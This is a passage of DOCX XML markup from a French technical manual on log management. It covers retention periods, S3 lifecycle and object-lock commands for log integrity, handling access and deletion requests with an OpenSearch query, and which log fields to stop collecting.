        <w:t>Conserver tout pour toujours coûte cher et augmente l'exposition. Conserver trop peu empêche toute enquête. La durée se décide par catégorie, en fonction d'un besoin réel.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.366 — Cinq durées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Catégorie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="257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Durée typique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Justification</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3219"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Journaux applicatifs</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30 à 90 jours</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Diagnostic courant</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Audit de sécurité</w:t>
            </w:r>
          </w:p>
        </w:tc>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1 an</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Enquête et conformité</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3219"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Audit d'accès aux données</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Selon obligation</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Preuve légale</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Métriques fines</w:t>
            </w:r>
          </w:p>
        </w:tc>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15 à 90 jours</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Analyse de tendance</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3219"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Traces</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2575"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>7 à 30 jours</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Diagnostic de performance</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une politique de cycle de vie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Cycle de vie : chaud 30 jours, froid 1 an, suppression ensuite</w:t>
        <w:br/>
        <w:t>aws s3api put-bucket-lifecycle-configuration \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --bucket journaux-app \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --lifecycle-configuration '{</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "Rules": [{</w:t>
        <w:br/>
        <w:t xml:space="preserve">      "ID": "retention",</w:t>
        <w:br/>
        <w:t xml:space="preserve">      "Filter": {"Prefix": "applicatif/"},</w:t>
        <w:br/>
        <w:t xml:space="preserve">      "Status": "Enabled",</w:t>
        <w:br/>
        <w:t xml:space="preserve">      "Transitions": [</w:t>
        <w:br/>
        <w:t xml:space="preserve">        {"Days": 30, "StorageClass": "STANDARD_IA"},</w:t>
        <w:br/>
        <w:t xml:space="preserve">        {"Days": 90, "StorageClass": "GLACIER"}</w:t>
        <w:br/>
        <w:t xml:space="preserve">      ],</w:t>
        <w:br/>
        <w:t xml:space="preserve">      "Expiration": {"Days": 400}</w:t>
        <w:br/>
        <w:t xml:space="preserve">    }]</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }'</w:t>
      </w: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UN JOURNAL EXPIRÉ NE REVIENT PAS</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Une enquête ouverte trois mois après un incident ne trouvera rien si la rétention était de trente jours. La durée se fixe avec les parties prenantes, pas par défaut technique.</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PSEUDONYMISATION</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Remplacement des identifiants directs par une valeur calculée, réversible seulement avec une clé conservée séparément. Elle réduit l'exposition sans rendre l'analyse impossible.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>92.3 Protéger l'intégrité</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un journal modifiable par l'attaquant ne prouve rien. Trois mesures le protègent : l'écriture en ajout seul, la séparation des droits et la copie externe.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Trois protections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Compte d'écriture seul : peut publier, ne peut pas supprimer</w:t>
        <w:br/>
        <w:t># (principe appliqué côté fournisseur ou côté objet immuable)</w:t>
        <w:br/>
        <w:t>aws s3api put-bucket-versioning --bucket journaux-audit \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --versioning-configuration Status=Enabled</w:t>
        <w:br/>
        <w:br/>
        <w:t>aws s3api put-object-lock-configuration --bucket journaux-audit \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --object-lock-configuration '{</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "ObjectLockEnabled": "Enabled",</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "Rule": {"DefaultRetention": {"Mode": "COMPLIANCE", "Days": 365}}</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }'</w:t>
        <w:br/>
        <w:br/>
        <w:t># Séparer les rôles : l'application écrit, la sécurité lit</w:t>
        <w:br/>
        <w:t>aws iam attach-role-policy --role-name app-journaux \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --policy-arn arn:aws:iam::aws:policy/...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.367 — Quatre mesures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70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Mesure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="347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Protège de</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="283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Coût</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Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Ajout seul</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3477"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Falsification</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Faible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Verrou d'objet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="347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Suppression</w:t>
            </w:r>
          </w:p>
        </w:tc>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Faible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2704"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Compte séparé</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3477"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Compromission applicative</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Moyen</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Horodatage externe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3477"/>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Antidatage</w:t>
            </w:r>
          </w:p>
        </w:tc>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Élevé</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LE JOURNAL NE DOIT PAS CONTENIR CE QUE L'ATTAQUANT CHERCHE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Un journal qui enregistre des jetons, des mots de passe ou des numéros de carte complets devient une base de secrets. Filtrez à l'émission, pas à la lecture.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>92.4 Demandes d'accès et de suppression</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les journaux contiennent des données personnelles dès qu'ils identifient une personne. Ils entrent donc dans le périmètre des demandes d'accès et de suppression, avec des exceptions légales à documenter.</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b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Localiser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> : savoir dans quels index et quelle rétention se trouve la donnée.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b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Extraire</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> : produire un export lisible pour la demande d'accès.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b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Supprimer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> : effacer dans les journaux actifs et les copies froides.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:pos="425" w:val="left"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="60" w:line="348" w:lineRule="exact"/>
        <w:ind w:left="425" w:hanging="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>4.</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Documenter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> : consigner la demande, la réponse et l'exception appliquée.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux opérations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Rechercher un identifiant dans les journaux (exemple OpenSearch)</w:t>
        <w:br/>
        <w:t>curl -s -X GET "https://journaux.exemple.fr/applicatif/_search" \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -H "Content-Type: application/json" -d '{</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "query": {"term": {"empreinte_utilisateur": "a1b2c3d4e5f6"}},</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "size": 0,</w:t>
        <w:br/>
        <w:t>"aggs": {"par_jour": {"date_histogram": {"field": "@timestamp",</w:t>
        <w:br/>
        <w:t xml:space="preserve">      "calendar_interval": "day"}}}</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }' | jq '.aggregations.par_jour.buckets'</w:t>
        <w:br/>
        <w:br/>
        <w:t># Supprimer par requête (si la politique le permet)</w:t>
        <w:br/>
        <w:t># POST applicatif/_delete_by_query</w:t>
        <w:br/>
        <w:t># { "query": { "term": { "empreinte_utilisateur": "a1b2c3d4e5f6" } } }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.368 — Quatre situations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9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Situation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Réponse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="283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Trace à conserver</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2962"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Demande d'accès</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Export sous 30 jours</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Demande et date</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Demande de suppression</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Effacement ou exception motivée</w:t>
            </w:r>
          </w:p>
        </w:tc>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Décision</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2962"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Enquête de sécurité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3219"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Conservation prolongée</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Motif et durée</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Litige</w:t>
            </w:r>
          </w:p>
        </w:tc>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Conservation jusqu'à clôture</w:t>
            </w:r>
          </w:p>
        </w:tc>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Référence du dossier</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>92.5 Ce qu'il faut arrêter de collecter</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La première optimisation de coût et de risque consiste à ne pas collecter. Chaque champ supplémentaire est une donnée à protéger, à chercher et à purger.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.369 — Cinq décisions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219"/>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Champ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="283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Utilité réelle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="296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Décision</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3219"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Corps complet de requête</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Parfois</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Journaliser à la demande</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Adresse IP complète</w:t>
            </w:r>
          </w:p>
        </w:tc>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Sécurité</w:t>
            </w:r>
          </w:p>
        </w:tc>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Tronquer après 30 jours</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3219"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Identifiant de session</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Diagnostic</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Pseudonymiser</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3219"/>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Numéro de carte</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="283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Aucune</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="296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Ne jamais journaliser</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3219"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Pile d'appels complète</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2833"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Diagnostic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2962"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Limiter aux erreurs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
